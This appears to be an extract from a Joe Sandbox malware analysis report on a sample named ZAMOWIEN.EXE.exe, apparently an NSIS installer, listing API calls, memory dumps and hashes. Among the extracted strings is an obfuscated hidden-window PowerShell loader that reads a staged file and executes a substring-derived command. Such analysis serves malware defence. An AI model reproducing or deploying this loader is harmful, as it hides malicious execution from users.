                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID:
                                                            • API String ID: 390214022-0
                                                            • Opcode ID: 1b535b2f77e26f19bb2a4b73d3ace5ecbe5a17c068042cb8380ef8c757cca308
                                                            • Instruction ID: 594037780aef2bbb7222699eae6bef26f59cc054eef20af3a1b4cc0f61f7743a
                                                            • Opcode Fuzzy Hash: 1b535b2f77e26f19bb2a4b73d3ace5ecbe5a17c068042cb8380ef8c757cca308
                                                            • Instruction Fuzzy Hash: ADE04F32B001E56ADB207AF18ECDD7FA1589B8434CB15017FF601B62C2DDBC2D418AA9
                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EBC,000000FF,00000004,00000000,00000000,00000000), ref: 00403089
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                                            • Instruction ID: 0981d36ce8a37324ca65ea29ac33eec068edb21049201a101882ec42e2df6d76
                                                            • Opcode Fuzzy Hash: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                                            • Instruction Fuzzy Hash: 3FE08C32151119BBCF205E619C08AEB3B5CEB007A6F00C033BA18E5190D630EB149BA8
                                                            APIs
                                                            • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString
                                                            • String ID:
                                                            • API String ID: 1096422788-0
                                                            • Opcode ID: 4ed2931d6e1322bdaa9ad50cb4953df85b5dadb3ad55792b24e6397abbc445e7
                                                            • Instruction ID: 0f98334ba99eddbf462717ac0d7b36237a5f237946376121c7889506776d1579
                                                            • Opcode Fuzzy Hash: 4ed2931d6e1322bdaa9ad50cb4953df85b5dadb3ad55792b24e6397abbc445e7
                                                            • Instruction Fuzzy Hash: 31E08630E44244BADB10AFB1CD49AFD7A68AF05710F10403AF9907B0D1EAB894429B1D
                                                            APIs
                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 0d24382ea5e76740c437774769d91117f1a5c710680a9b2c64fc1357c401aa2b
                                                            • Instruction ID: c88b0ddfb076c9ac8c8172e2ede98752ab09736af03c38ff4908af3a3297ae85
                                                            • Opcode Fuzzy Hash: 0d24382ea5e76740c437774769d91117f1a5c710680a9b2c64fc1357c401aa2b
                                                            • Instruction Fuzzy Hash: 6CD01233B041149BCB00DBA89E4899D77A0DB44325F248637D111F11D1D6BD85416619
                                                            APIs
                                                            • SendMessageA.USER32(00010432,00000000,00000000,00000000), ref: 00403EEA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                                            • Instruction ID: 520eeca43096a233c1d1edcfb324fa3ae1c1311985607c8c229424cb44f36652
                                                            • Opcode Fuzzy Hash: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                                            • Instruction Fuzzy Hash: 29C04C716442016AEA218B519D49F0777596750701F188425B610A50D1C6B4E410D66D
                                                            APIs
                                                            • SendMessageA.USER32(00000028,?,00000001,00403CF2), ref: 00403ECF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                                            • Instruction ID: 6533290ec96ace9f69d4b5d2bc7ee10b2e44395606cff802ce15a0f50474627a
                                                            • Opcode Fuzzy Hash: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                                            • Instruction Fuzzy Hash: 99B01235588200BBEE224B00DD0DF457EA2F7A4701F00C024F300240F1C7B200A5DB19
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFA,?), ref: 004030B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,00403C8B), ref: 00403EB8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                                            • Instruction ID: 4f3b606e1f3b2692e0293683fec327d542fd6d14cd426307677a9e2f6e263f5f
                                                            • Opcode Fuzzy Hash: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                                            • Instruction Fuzzy Hash: F2A01231404001EBCB018B10DF05C057F21B7503007018421E1404003486310420FF1A
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 0040481E
                                                            • GetDlgItem.USER32(?,00000408), ref: 00404829
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404873
                                                            • LoadBitmapA.USER32(0000006E), ref: 00404886
                                                            • SetWindowLongA.USER32(?,000000FC,00404DFD), ref: 0040489F
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048C5
                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 004048DB
                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E7
                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048F9
                                                            • DeleteObject.GDI32(00000000), ref: 004048FC
                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404927
                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404933
                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049C8
                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F3
                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A07
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404A36
                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A44
                                                            • ShowWindow.USER32(?,00000005), ref: 00404A55
                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B52
                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BB7
                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BCC
                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF0
                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C10
                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00404C25
                                                            • GlobalFree.KERNEL32(00000000), ref: 00404C35
                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CAE
                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404D57
                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D66
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D86
                                                            • ShowWindow.USER32(?,00000000), ref: 00404DD4
                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404DDF
                                                            • ShowWindow.USER32(00000000), ref: 00404DE6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 1638840714-813528018
                                                            • Opcode ID: 32d9f52f6819587b7ed6241fb620a6eea0278c22ece4e77b55e45d580558046c
                                                            • Instruction ID: 3608db388d5848d75b41923d60e9f713ca1dc8452aec108ffb9ca10d8834ebbb
                                                            • Opcode Fuzzy Hash: 32d9f52f6819587b7ed6241fb620a6eea0278c22ece4e77b55e45d580558046c
                                                            • Instruction Fuzzy Hash: 79027EB0900209AFEB10DF54DC85AAE7BB5FB85315F10853AF610BA2E1C7789E42DF58
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404319
                                                            • SetWindowTextA.USER32(00000000,?), ref: 00404343
                                                            • SHBrowseForFolderA.SHELL32(?,0079E0D0,?), ref: 004043F4
                                                            • CoTaskMemFree.OLE32(00000000), ref: 004043FF
                                                            • lstrcmpiA.KERNEL32(007A16A0,folketingssamlingerne Setup: Completed), ref: 00404431
                                                            • lstrcatA.KERNEL32(?,007A16A0), ref: 0040443D
                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040444F
                                                              • Part of subcall function 00405391: GetDlgItemTextA.USER32(?,?,00000400,00404486), ref: 004053A4
                                                              • Part of subcall function 00405DE7: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 00405E3F
                                                              • Part of subcall function 00405DE7: CharNextA.USER32(?,?,?,00000000), ref: 00405E4C
                                                              • Part of subcall function 00405DE7: CharNextA.USER32(?,"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 00405E51
                                                              • Part of subcall function 00405DE7: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 00405E61
                                                            • GetDiskFreeSpaceA.KERNEL32(0079DCC8,?,?,0000040F,?,0079DCC8,0079DCC8,?,00000000,0079DCC8,?,?,000003FB,?), ref: 0040450A
                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404525
                                                            • SetDlgItemTextA.USER32(00000000,00000400,0079DCB8), ref: 004045AB
                                                            Strings
                                                            • C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings, xrefs: 0040441A
                                                            • -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", xrefs: 004042E3
                                                            • folketingssamlingerne Setup: Completed, xrefs: 004043C7, 0040442A
                                                            • A, xrefs: 004043ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                            • String ID: -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"$A$C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings$folketingssamlingerne Setup: Completed
                                                            • API String ID: 2246997448-602633758
                                                            • Opcode ID: c53189ce69e9217790c400ea693ce24eef941722819f6d620fc410724e3aaa59
                                                            • Instruction ID: 4ae84918bfcb19ccc062e7c66334806cf97196d40f906e8bfa3db2fe6562258c
                                                            • Opcode Fuzzy Hash: c53189ce69e9217790c400ea693ce24eef941722819f6d620fc410724e3aaa59
                                                            • Instruction Fuzzy Hash: E79182B1900209ABDB10AFA5CC81BAF77B8EF85314F14447BFB15B62D1C77C9A418B69
                                                            APIs
                                                            • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409398,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                                            Strings
                                                            • C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings, xrefs: 004020C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
